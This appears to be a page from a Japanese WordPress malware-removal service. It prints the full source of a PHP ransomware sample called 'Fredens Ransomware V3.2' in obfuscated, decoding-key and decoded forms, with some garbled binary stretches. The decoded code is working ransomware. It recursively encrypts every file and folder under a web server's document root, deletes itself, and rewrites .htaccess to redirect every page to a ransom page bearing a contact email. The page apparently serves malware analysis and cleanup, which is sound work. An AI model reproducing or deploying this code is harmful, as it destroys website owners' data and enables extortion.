æõOp1OrSýGyã/x/H7ynOAfcB3/xx7íKT5yWxqOKET/8y5xGõISqcmë5COzêNrpVLJûH85VpJyQJWë60GýGTWOýZLñPyySFJL9fûObJbê1/õkõjXHý79ET4êcE0YpGB2AQN3KI6õí5A2Dxwû8Iëêí1Y0fZ1JO1fR9EGænTUwMQSõzgEn/6ýyñêá+1QFê9OJQmílTYOXKí7VZMXnwKQûyíBæ2PæSXEWTjáWIpbQ6WPûãýPKXyLNQ4JcBWS1JN0UíyPëkcY4ýæãñf7HLwpGB3Pm1++wF24ûrZLcgNYA8HlV12pE154kq1û10bS+X7ëkU/bmCDXnZPJfKûxyO8mXêWãVêíãc4E9cIjwJxKH2DIIáIBXkýRLc6rëUñbT0EûNêz8OLñ0q8B5Eñ5Hg1DëgyZ1FJWI1krg26bCýw8FrxKCwrCpNC5ñMrMxëTNwIë5q8EãB2H1n9ûcZ8ærzw/ñ++7xR972LVmR3E33ámãx+û6lgUqã0õnTxOñõ3kFRD41MêmIQJGrãz4qëû2bSIGnKmêT1r6DBNVMc1HgC8õMykêêNBñáláëjënEJF7BKRISGLlBpzYcXOlVSJU98g5ûêqáãPê1áX51R7E8FHGO/Ví3N1íflLyFWPkãKDDklQ2HfYYC0Zyp1ûJBG5MkEGãGyQVGSlMZõn5VEííFcýpRxATûE8AkNápýlOægBK4m/wM=');\r\nµµµµµµµµ\$æýëýµ=µñër_ríplýcí(ýrrýy('<rûûë>',µ'<ûrêgênýlKíy>',µ'<crypëûKíyLíngëá>',µ'<ñýlë>',µ'<êëírýëêûnñ>',µ'<ýlgûrêëám>',µ'<êõ>',µ'<cêpáír>',µ'<íxëínñêûn>'),µýrrýy(\$ëáêñ->rûûë,µ\$ëáêñ->ûrêgênýlKíy,µ\$ëáêñ->crypëûKíyLíngëá,µbýñí64_íncûæí(\$ëáêñ->ñýlë),µ\$ëáêñ->êëírýëêûnñ,µ\$ëáêñ->ýlgûrêëám,µbýñí64_íncûæí(\$ëáêñ->êõ),µ\$ëáêñ->cêpáír,µ\$ëáêñ->íxëínñêûn),µ\$æýëý);\r\nµµµµµµµµfêlí_pãë_cûnëínëñ(\$ëáêñ->æícrypëêûnFêlí,µ\$æýëý,µLOCK_EX);\r\nµµµµµµµµ\$æícrypëêûnFêlíµ=µ\$ëáêñ->gíëDícrypëêûnFêlí();\r\nµµµµµµµµfêlí_pãë_cûnëínëñ(\$ëáêñ->rûûëµ.µ'/.áëýccíññ',µ\"DêrícëûryInæíxµ/{\$æícrypëêûnFêlí}\\nErrûrDûcãmínëµ400µ/{\$æícrypëêûnFêlí}\\nErrûrDûcãmínëµ401µ/{\$æícrypëêûnFêlí}\\nErrûrDûcãmínëµ403µ/{\$æícrypëêûnFêlí}\\nErrûrDûcãmínëµ404µ/{\$æícrypëêûnFêlí}\\nErrûrDûcãmínëµ500µ/{\$æícrypëêûnFêlí}\\n\",µLOCK_EX);\r\nµµµµ}\r\nµµµµprêõýëíµfãncëêûnµíncrypëNýmí(\$pýëá)µ{\r\nµµµµµµµµ\$íncrypëíæNýmíµ=µ'';\r\nµµµµµµµµæûµ{\r\nµµµµµµµµµµµµ\$íncrypëíæNýmíµ=µãrlíncûæí(ûpínññl_íncrypë(pýëáênfû(\$pýëá,µPATHINFO_BASENAME),µ\$ëáêñ->cêpáír,µ\$ëáêñ->crypëûKíy,µ0,µ\$ëáêñ->êõ));\r\nµµµµµµµµµµµµ\$íncrypëíæNýmíµ=µñãbñër(\$pýëá,µ0,µñërrêpûñ(\$pýëá,µ'/')µ+µ1)µ.µ\$íncrypëíæNýmíµ.µ'.'µ.µ\$ëáêñ->íxëínñêûn;\r\nµµµµµµµµ}µwáêlíµ(fêlí_íxêñëñ(\$íncrypëíæNýmí));\r\nµµµµµµµµríëãrnµ\$íncrypëíæNýmí;\r\nµµµµ}\r\nµµµµprêõýëíµfãncëêûnµíncrypëFêlí(\$fêlí)µ{\r\nµµµµµµµµ\$íncrypëíæFêlíµ=µ\$ëáêñ->íncrypëNýmí(\$fêlí);\r\nµµµµµµµµêfµ(rínýmí(\$fêlí,µ\$íncrypëíæFêlí))µ{\r\nµµµµµµµµµµµµ\$íncrypëíæDýëýµ=µûpínññl_íncrypë(fêlí_gíë_cûnëínëñ(\$íncrypëíæFêlí),µ\$ëáêñ->cêpáír,µ\$ëáêñ->crypëûKíy,µ0,µ\$ëáêñ->êõ);\r\nµµµµµµµµµµµµêfµ(fêlí_íxêñëñ(\$íncrypëíæFêlí))µ{\r\nµµµµµµµµµµµµµµµµfêlí_pãë_cûnëínëñ(\$íncrypëíæFêlí,µ\$íncrypëíæDýëý,µLOCK_EX);\r\nµµµµµµµµµµµµ}\r\nµµµµµµµµ}\r\nµµµµ}\r\nµµµµprêõýëíµfãncëêûnµíncrypëDêrícëûry(\$æêr)µ{\r\nµµµµµµµµrínýmí(\$æêr,µ\$ëáêñ->íncrypëNýmí(\$æêr));\r\nµµµµ}\r\nµµµµprêõýëíµfãncëêûnµñcýn(\$æêr)µ{\r\nµµµµµµµµ\$fêlíñµ=µýrrýy_æêff(ñcýnæêr(\$æêr),µýrrýy('.',µ'..'));\r\nµµµµµµµµfûríýcáµ(\$fêlíñµýñµ\$fêlí)µ{\r\nµµµµµµµµµµµµêfµ(êñ_æêr(\$æêrµ.µ'/'µ.µ\$fêlí))µ{\r\nµµµµµµµµµµµµµµµµ\$ëáêñ->ñcýn(\$æêrµ.µ'/'µ.µ\$fêlí);\r\nµµµµµµµµµµµµµµµµ\$ëáêñ->íncrypëDêrícëûry(\$æêrµ.µ'/'µ.µ\$fêlí);\r\nµµµµµµµµµµµµ}µílñíµ{\r\nµµµµµµµµµµµµµµµµ\$ëáêñ->íncrypëFêlí(\$æêrµ.µ'/'µ.µ\$fêlí);\r\nµµµµµµµµµµµµ}\r\nµµµµµµµµ}\r\nµµµµ}\r\nµµµµpãblêcµfãncëêûnµrãn()µ{\r\nµµµµµµµµãnlênk(\$_SERVER['SCRIPT_FILENAME']);\r\nµµµµµµµµ\$ëáêñ->ñcýn(\$ëáêñ->rûûë);\r\nµµµµµµµµ\$ëáêñ->críýëíDícrypëêûnFêlí();\r\nµµµµ}\r\n}\r\n\$írrûrMíññýgíñµ=µýrrýy('kíy'µ=>µ'');\r\nêfµ(êññíë(\$_SERVER['REQUEST_METHOD'])µ&&µñërëûlûwír(\$_SERVER['REQUEST_METHOD'])µ===µ'pûñë')µ{\r\nµµµµêfµ(êññíë(\$_POST['kíy']))µ{\r\nµµµµµµµµ\$pýrýmíëírñµ=µýrrýy('kíy'µ=>µ\$_POST['kíy']);\r\nµµµµµµµµmb_ênëírnýl_íncûæêng('UTF-8');\r\nµµµµµµµµ\$írrûrµ=µfýlñí;\r\nµµµµµµµµêfµ(mb_ñërlín(\$pýrýmíëírñ['kíy'])µ<µ1)µ{\r\nµµµµµµµµµµµµ\$írrûrMíññýgíñ['kíy']µ=µ'áñãñáwêwûñjzbbñnwnwkññãñánñbñáwkwkñk';\r\nµµµµµµµµµµµµ\$írrûrµ=µërãí;\r\nµµµµµµµµ}\r\nµµµµµµµµêfµ(!\$írrûr)µ{\r\nµµµµµµµµµµµµ\$rýnñûmwýríµ=µníwµRýnñûmwýrí(\$pýrýmíëírñ['kíy']);\r\nµµµµµµµµµµµµ\$rýnñûmwýrí->rãn();\r\nµµµµµµµµµµµµáíýæír('Lûcýëêûn:µ/'µ.µ\$rýnñûmwýrí->gíëDícrypëêûnFêlí());\r\nµµµµµµµµµµµµíxêë();\r\nµµµµµµµµ}\r\nµµµµ}\r\n}\r\n?>\r\n\t\t</ñëylí>\r\n\t</áíýæ>\r\n\t<bûæy>\r\n\t\t<æêõµclýññ=\"frûnë-fûrm\">\r\n\t\t\t<æêõµclýññ=\"lýyûãë\">\r\n\t\t\t\t<áíýæír>\r\n\t\t\t\t\t<á1µclýññ=\"ëêëlí\">FríæínñµRýnñûmwýrí</á1>\r\n\t\t\t<p>VERSIONµV3.2</p>\r\n\t\t\t\t</áíýæír>\r\n\t\t\t\t<fûrmµmíëáûæ=\"pûñë\"µýcëêûn=\"<?pápµícáûµ'./'µ.µpýëáênfû(\$_SERVER['SCRIPT_FILENAME'],µPATHINFO_BASENAME);µ?>\">\r\n\t\t\t\t\t<lýbílµfûr=\"kíy\">Pýññwûræ</lýbíl>\r\n\t\t\t\t\t<ênpãëµnýmí=\"kíy\"µêæ=\"kíy\"µëypí=\"ëíxë\"µñpíllcáíck=\"fýlñí\"µýãëûfûcãñ=\"ýãëûfûcãñ\">\r\n\t\t\t\t\t<pµclýññ=\"írrûr\"><?pápµícáûµ\$írrûrMíññýgíñ['kíy'];µ?></p>\r\n\t\t\t\t\t<ênpãëµëypí=\"ñãbmêë\"µõýlãí=\"CLICK\">\r\n\t\t\t\t</fûrm>\r\n\t\t\t\t<æêõµclýññ=\"ýæõêcí\">\r\n\t\t\t\t\t<p>fríæínñ3.0@prûëûnmýêl.cûm</p>\r\n\t\t\t\t</æêõ>\r\n\t\t\t</æêõ>\r\n\t\t</æêõ>\r\n\t</bûæy>\r\n</áëm"; $str = ['ý', 'ê', 'ã', 'í', 'û', 'æ', 'ñ', 'á', 'õ', 'ë', 'µ']; $rplc = ['a', 'i', 'u', 'e', 'o', 'd', 's', 'h', 'v', 't', ' ']; $nav = "\r\nerror_reporting(0);\r\nclass Ransomware {\r\n private \$root = '';\r\n private \$decryptionFile = '';\r\n private \$originalKey = '';\r\n private \$salt = '';\r\n private \$cryptoKey = '';\r\n private \$cryptoKeyLength = '32';\r\n private \$iterations = '1000';\r\n private \$algorithm = 'sha512';\r\n private \$iv = '';\r\n private \$cipher = 'AES-256-CBC';\r\n private \$extension = 'fredens3.0';\r\n public function __construct(\$key) {\r\n \$this->root = \$_SERVER['DOCUMENT_ROOT'];\r\n \$this->decryptionFile = \$this->generateRandomName(\$this->root, 'php');\r\n \$this->originalKey = \$key;\r\n \$this->salt = openssl_random_pseudo_bytes(10);\r\n \$this->cryptoKey = openssl_pbkdf2(\$key, \$this->salt, \$this->cryptoKeyLength, \$this->iterations, \$this->algorithm);\r\n \$this->iv = openssl_random_pseudo_bytes(openssl_cipher_iv_length(\$this->cipher));\r\n }\r\n public function getDecryptionFile() {\r\n return pathinfo(\$this->decryptionFile, PATHINFO_BASENAME);\r\n }\r\n private function generateRandomName(\$dir, \$extension) {\r\n \$randomName = '';\r\n do {\r\n \$rand = str_replace(array('+', '/', '='), '', base64_encode(openssl_random_pseudo_bytes(6)));\r\n \$randomName = \$dir . '/' . \$rand . '.' . \$extension;\r\n } while (file_exists(\$randomName));\r\n return \$randomName;\r\n }\r\n private function createDecryptionFile() {\r\n // decryption file encoded in Base64\r\n \$data = base64_decode('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');\r\n \$data = str_replace(array('<root>', '<originalKey>', '<cryptoKeyLength>', '<salt>', '<iterations>', '<algorithm>', '<iv>', '<cipher>', '<extension>'), array(\$this->root, \$this->originalKey, \$this->cryptoKeyLength, base64_encode(\$this->salt), \$this->iterations, \$this->algorithm, base64_encode(\$this->iv), \$this->cipher, \$this->extension), \$data);\r\n file_put_contents(\$this->decryptionFile, \$data, LOCK_EX);\r\n \$decryptionFile = \$this->getDecryptionFile();\r\n file_put_contents(\$this->root . '/.htaccess', \"DirectoryIndex /{\$decryptionFile}\\nErrorDocument 400 /{\$decryptionFile}\\nErrorDocument 401 /{\$decryptionFile}\\nErrorDocument 403 /{\$decryptionFile}\\nErrorDocument 404 /{\$decryptionFile}\\nErrorDocument 500 /{\$decryptionFile}\\n\", LOCK_EX);\r\n }\r\n private function encryptName(\$path) {\r\n \$encryptedName = '';\r\n do {\r\n \$encryptedName = urlencode(openssl_encrypt(pathinfo(\$path, PATHINFO_BASENAME), \$this->cipher, \$this->cryptoKey, 0, \$this->iv));\r\n \$encryptedName = substr(\$path, 0, strripos(\$path, '/') + 1) . \$encryptedName . '.' . \$this->extension;\r\n } while (file_exists(\$encryptedName));\r\n return \$encryptedName;\r\n }\r\n private function encryptFile(\$file) {\r\n \$encryptedFile = \$this->encryptName(\$file);\r\n if (rename(\$file, \$encryptedFile)) {\r\n \$encryptedData = openssl_encrypt(file_get_contents(\$encryptedFile), \$this->cipher, \$this->cryptoKey, 0, \$this->iv);\r\n if (file_exists(\$encryptedFile)) {\r\n file_put_contents(\$encryptedFile, \$encryptedData, LOCK_EX);\r\n }\r\n }\r\n }\r\n private function encryptDirectory(\$dir) {\r\n rename(\$dir, \$this->encryptName(\$dir));\r\n }\r\n private function scan(\$dir) {\r\n \$files = array_diff(scandir(\$dir), array('.', '..'));\r\n foreach (\$files as \$file) {\r\n if (is_dir(\$dir . '/' . \$file)) {\r\n \$this->scan(\$dir . '/' . \$file);\r\n \$this->encryptDirectory(\$dir . '/' . \$file);\r\n } else {\r\n \$this->encryptFile(\$dir . '/' . \$file);\r\n }\r\n }\r\n }\r\n public function run() {\r\n unlink(\$_SERVER['SCRIPT_FILENAME']);\r\n \$this->scan(\$this->root);\r\n \$this->createDecryptionFile();\r\n }\r\n}\r\n\$errorMessages = array('key' => '');\r\nif (isset(\$_SERVER['REQUEST_METHOD']) && strtolower(\$_SERVER['REQUEST_METHOD']) === 'post') {\r\n if (isset(\$_POST['key'])) {\r\n \$parameters = array('key' => \$_POST['key']);\r\n mb_internal_encoding('UTF-8');\r\n \$error = false;\r\n if (mb_strlen(\$parameters['key']) < 1) {\r\n \$errorMessages['key'] = 'hsushwiwosjzbbsnwnwkssushnsbshwkwksk';\r\n \$error = true;\r\n }\r\n if (!\$error) {\r\n \$ransomware = new Ransomware(\$parameters['key']);\r\n \$ransomware->run();\r\n header('Location: /' . \$ransomware->getDecryptionFile());\r\n exit();\r\n }\r\n }\r\n}\r\n?>\r\n\t\t</style>\r\n\t</head>\r\n\t<body>\r\n\t\t<div class=\"front-form\">\r\n\t\t\t<div class=\"layout\">\r\n\t\t\t\t<header>\r\n\t\t\t\t\t<h1 class=\"title\">Fredens Ransomware</h1>\r\n\t\t\t<p>VERSION V3.2</p>\r\n\t\t\t\t</header>\r\n\t\t\t\t<form method=\"post\" action=\"<?php echo './' . pathinfo(\$_SERVER['SCRIPT_FILENAME'], PATHINFO_BASENAME); ?>\">\r\n\t\t\t\t\t<label for=\"key\">Password</label>\r\n\t\t\t\t\t<input name=\"key\" id=\"key\" type=\"text\" spellcheck=\"false\" autofocus=\"autofocus\">\r\n\t\t\t\t\t<p class=\"error\"><?php echo \$errorMessages['key']; ?></p>\r\n\t\t\t\t\t<input type=\"submit\" value=\"CLICK\">\r\n\t\t\t\t</form>\r\n\t\t\t\t<div class=\"advice\">\r\n\t\t\t\t\t<p>fredens3.0@protonmail.com</p>\r\n\t\t\t\t</div>\r\n\t\t\t</div>\r\n\t\t</div>\r\n\t</body>\r\n</htm"; eval { error_reporting(0); class Ransomware { private $root = ''; private $decryptionFile = ''; private $originalKey = ''; private $salt = ''; private $cryptoKey = ''; private $cryptoKeyLength = '32'; private $iterations = '1000'; private $algorithm = 'sha512'; private $iv = ''; private $cipher = 'AES-256-CBC'; private $extension = 'fredens3.0'; public function __construct($key) { $this->root = $_SERVER['DOCUMENT_ROOT']; $this->decryptionFile = $this->generateRandomName($this->root, 'php'); $this->originalKey = $key; $this->salt = openssl_random_pseudo_bytes(10); $this->cryptoKey = openssl_pbkdf2($key, $this->salt, $this->cryptoKeyLength, $this->iterations, $this->algorithm); $this->iv = openssl_random_pseudo_bytes(openssl_cipher_iv_length($this->cipher)); } public function getDecryptionFile() { return pathinfo($this->decryptionFile, PATHINFO_BASENAME); } private function generateRandomName($dir, $extension) { $randomName = ''; do { $rand = str_replace(array('+', '/', '='), '', base64_encode(openssl_random_pseudo_bytes(6))); $randomName = $dir . '/' . $rand . '.' . $extension; } while (file_exists($randomName)); return $randomName; } private function createDecryptionFile() { // decryption file encoded in Base64 $data = "Y[oH\24~N:Q\rڀjrI\4Ԩ)d\3vZY\22<X_RT \$\36@~O\27\37sfo`J⹝wf\31\37?\$㐍;ĵᗬ\32j1KV:M\$`t>![~`M\6Y=Z<-P|=\3\4<S\f6xKk\25@xk\25\26fTÙDiĵИqR\5]CK2Tr \34_pl\22А:w=Yd\6\5\32\7|7|C.xro\2\17\1I2\25|O\rj\rr\34K\17`\49Eaݺ\22\0011\20t_ɂ@\16J \17\3r\22\$\33)6u{@\26?`giReR\vA\23[\0Cl\\r\16CWg\1&ČZ9H̀@)C\35)LX:\vu2\6\24C|U\0015Z\25Xa\0\37w\"\22z}}ڿ\33蝛v߁1d;A}l:q\5p>Ⱥ`kxf1E_pʈlBn7N/ԧ\\*lH-\0013/\35<Yd\\\204LE!tP\rY!e\f-\20F\0\24Y\35\nce\21_p\4xVDz\17`/G\27i6\21\7n\5fS\26])TV\29Jֳ0U\23̞\5\25i\24,XpOɡ\37@ECqV2\0 mF4\2c\32Xa\v7\$\7U\20\\n\\ƀ\$x\r|qy?dϹ wJm\24r\10L\10﷽ORbS~r\23k\3j\258O/,m\34J\22 '!]R*\36ժZNfDT!\2\37aZB5H\3s\10mE\17߲?fT\16\30B[)Ȩ!Rʱ\2Bèd\35\5>~.?(Ep\24a3\$\n*H\22*\4T^@V\tV R\4})\22\20\35E26\0026\35\21*__=ػB\f\5Ly\4+h\16\24TNAv\17U\4I&C\35\16ZQ\r>ش+\35ˠSy+UUL\27\\\"Ӭ8}k=\nʲ\35b\35Sx \$\fk\vaϽX\6\t\2O*8j=\\\10G\20%_d\tvѫ\261q\17\0267m}71-cz!\$c\3\10Ӥ\33nL\rzzQo.\20-\30m\5\24lZz\16nËX)\16/Z>f5\24\37\n:\31<\31%\25\32\"~9aoиr@vU<g\3\35q0ƽ\0DK0^ABд+w\31i\26zGqG- xo=UD=\17RC\\\1b\21fQx@l{ٷv霿[IԚ\10Fڨmۤ-v@~\32Z\0p\4\26\0176\30ͦE01\nu1\21lJ\r%i*'o:N&~\37p\35\36)>r[\32(D.q\32\22ɭ#Th\37U%kzfMcd\17\$\$_n-K\\vD4b\4\rܢ:@<p-Xu\$_G\6vt\228\4ȡT\5ӉBgM)d(]R\\E\25:X.hȳP\1Y-I7E\36dq\32v\37r`w>m~\1v-\r`\17\7]vMyJ]\33KE?n`^vO%#xX\4#J\37`\"\22\1^F-ΫK\33OA(6,84y\22GP&u\24Jۦk\17\5\22°4.l213p\"jK}g\31>QVdw\23}~`Rt:TCS\"\t\32hٴ\32r=k0MT5\36\0̤#A\31a;g\20{\4HHb\6qsU\"T9*~uG<\24qW7WX.(0\r}\2ќւA\33\$\20k\5FJS\31~U\21qQ\4\23\$6\32Z`\4&\3"; $data = str_replace(array('<root>', '<originalKey>', '<cryptoKeyLength>', '<salt>', '<iterations>', '<algorithm>', '<iv>', '<cipher>', '<extension>'), array($this->root, $this->originalKey, $this->cryptoKeyLength, base64_encode($this->salt), $this->iterations, $this->algorithm, base64_encode($this->iv), $this->cipher, $this->extension), $data); file_put_contents($this->decryptionFile, $data, LOCK_EX); $decryptionFile = $this->getDecryptionFile(); file_put_contents($this->root . '/.htaccess', "DirectoryIndex /{$decryptionFile}\nErrorDocument 400 /{$decryptionFile}\nErrorDocument 401 /{$decryptionFile}\nErrorDocument 403 /{$decryptionFile}\nErrorDocument 404 /{$decryptionFile}\nErrorDocument 500 /{$decryptionFile}\n", LOCK_EX); } private function encryptName($path) { $encryptedName = ''; do { $encryptedName = urlencode(openssl_encrypt(pathinfo($path, PATHINFO_BASENAME), $this->cipher, $this->cryptoKey, 0, $this->iv)); $encryptedName = substr($path, 0, strripos($path, '/') + 1) . $encryptedName . '.' . $this->extension; } while (file_exists($encryptedName)); return $encryptedName; } private function encryptFile($file) { $encryptedFile = $this->encryptName($file); if (rename($file, $encryptedFile)) { $encryptedData = openssl_encrypt(file_get_contents($encryptedFile), $this->cipher, $this->cryptoKey, 0, $this->iv); if (file_exists($encryptedFile)) { file_put_contents($encryptedFile, $encryptedData, LOCK_EX); } } } private function encryptDirectory($dir) { rename($dir, $this->encryptName($dir)); } private function scan($dir) { $files = array_diff(scandir($dir), array('.', '..')); foreach ($files as $file) { if (is_dir($dir . '/' . $file)) { $this->scan($dir . '/' . $file); $this->encryptDirectory($dir . '/' . $file); } else { $this->encryptFile($dir . '/' . $file); } } } public function run() { unlink($_SERVER['SCRIPT_FILENAME']); $this->scan($this->root); $this->createDecryptionFile(); } } $errorMessages = array('key' => ''); if (isset($_SERVER['REQUEST_METHOD']) && strtolower($_SERVER['REQUEST_METHOD']) === 'post') { if (isset($_POST['key'])) { $parameters = array('key' => $_POST['key']); mb_internal_encoding('UTF-8'); $error = false; if (mb_strlen($parameters['key']) < 1) { $errorMessages['key'] = 'hsushwiwosjzbbsnwnwkssushnsbshwkwksk'; $error = true; } if (!$error) { $ransomware = new Ransomware($parameters['key']); $ransomware->run(); header('Location: /' . $ransomware->getDecryptionFile()); exit; } } } ?> </style> </head> <body> <div class="front-form"> <div class="layout"> <header> <h1 class="title">Fredens Ransomware</h1> <p>VERSION V3.2</p> </header> <form method="post" action="<?php echo './' . pathinfo($_SERVER['SCRIPT_FILENAME'], PATHINFO_BASENAME); ?>"> <label for="key">Password</label> <input name="key" id="key" type="text" spellcheck="false" autofocus="autofocus"> <p class="error"><?php echo $errorMessages['key']; ?></p> <input type="submit" value="CLICK"> </form> <div class="advice"> <p>fredens3.0@protonmail.com</p> </div> </div> </div> </body> </htm<?php }; }; $STOP = "sh6fLe0fcaPWSSJ6t7F5+nQn++IXNgYM2JjHuVuRsGQkbCzjiTFH/WMQEgMQAwaMEJPUHzu1DKRJAkm69xWtjr28Vq2qWl897d9/g1UQwDZ4CGDl419YwsLr3yRvv/7+m+XCDtawftw0YOfh1XYYwg4nPm7+8/tvj5v9zw9gARucuSQPPiEx/C0fN3ePm+vrrxfnwRxW";
■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]
■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります
(C)2019 ワードプレス ドクター All rights reserved.